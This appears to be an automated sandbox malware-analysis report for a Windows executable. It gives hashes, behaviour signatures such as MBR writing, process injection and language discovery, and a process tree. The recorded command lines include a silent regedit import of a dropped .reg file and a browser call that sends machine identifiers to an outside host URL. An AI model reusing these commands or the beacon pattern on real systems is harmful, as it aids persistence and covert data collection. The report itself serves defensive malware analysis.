Analysis
max time kernel: 0s
max time network: 33s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 31/10/2024, 14:49
Static task: static1
Behavioral task: behavioral1
  Sample: 835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: 835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe
  Resource: win10v2004-20241007-en
General
Target: 835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe
Size: 60KB
MD5: 835759aebbd9d2ac10b6e7ae25b7e8d3
SHA1: d47d1d378c9b20dc3ce2e5c202fa9f8478e06b98
SHA256: 02cd7c84b903401c79912c13872510517779077cf3b4dfb683e2d01b3a48fae2
SHA512: 3da4c02fe8d48336497ca4a0c1c8a29b9c081ac10cd6540948f2595268febb36de5fbd092a708a0173c624c24b1a129529786695ea462bca20e2cb53a47d3cf2
SSDEEP: 768:TED6ScJar0b01CamqZHKyKMB4Rn2iYkHj1WBw/N5bMzPRd/UIKJyFd/k:QcJar0O5m6eD1Wu07UuFdc
Malware Config
Signatures
Writes to the Master Boot Record (MBR) (1 TTPs, 1 IoCs)
Bootkits write to the MBR to gain persistence at a level below the operating system.
  File opened for modification: \??\PhysicalDrive0 (process: 835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe)
System Location Discovery: System Language Discovery (1 TTPs, 2 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (process: cmd.exe)
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (process: 835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe)
Runs .reg file with regedit (1 IoCs)
  PID 1588: regedit.exe
Suspicious behavior: EnumeratesProcesses (2 IoCs)
  PID 4488: 835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe
  PID 4488: 835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe
Suspicious use of SetWindowsHookEx (1 IoCs)
  PID 4488: 835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe
Suspicious use of WriteProcessMemory (5 IoCs)
  PID 4488 (835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe) wrote to memory of PID 752 (procid_target 86)
  PID 4488 (835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe) wrote to memory of PID 752 (procid_target 86)
  PID 4488 (835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe) wrote to memory of PID 752 (procid_target 86)
  PID 4488 (835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe) wrote to memory of PID 3300 (procid_target 88)
  PID 4488 (835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe) wrote to memory of PID 3300 (procid_target 88)
Processes
C:\Users\Admin\AppData\Local\Temp\835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\835759aebbd9d2ac10b6e7ae25b7e8d3_JaffaCakes118.exe"
  PID: 4488
  - Writes to the Master Boot Record (MBR)
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd.exe /c regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
    PID: 752
    - System Location Discovery: System Language Discovery
    C:\Windows\SysWOW64\regedit.exe
      Command line: regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
      PID: 1588
      - Runs .reg file with regedit
  C:\Program Files\Internet Explorer\iexplore.exe
    Command line: "C:\Program Files\Internet Explorer\iexplore.exe" http://union.wanwan.cc/Stat.ashx?Mac=CA65FB447FB&Hard=232138804165&ClientType=Home&Process=88&UserID=0017&Authen=758-727
    PID: 3300
    C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3300 CREDAT:17410 /prefetch:2
      PID: 1520
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 1KB
MD5: 626e2d76f5c328d57a3eff6a7f94d129
SHA1: 210fd33fa005775b30a8fd40a065a2e788934216
SHA256: 5d9ae4b62924d6da9c35305bfd0d61c893767b7113f8b2f239da02057f8bee6e
SHA512: 629290bd5791a42327b3b70a68609c6b0b9114365be8579553e01e6cbc98996c0fab475b88c0dd80d34dcc325453401c6cce26fb70ed67a9cb08271a07fd85a1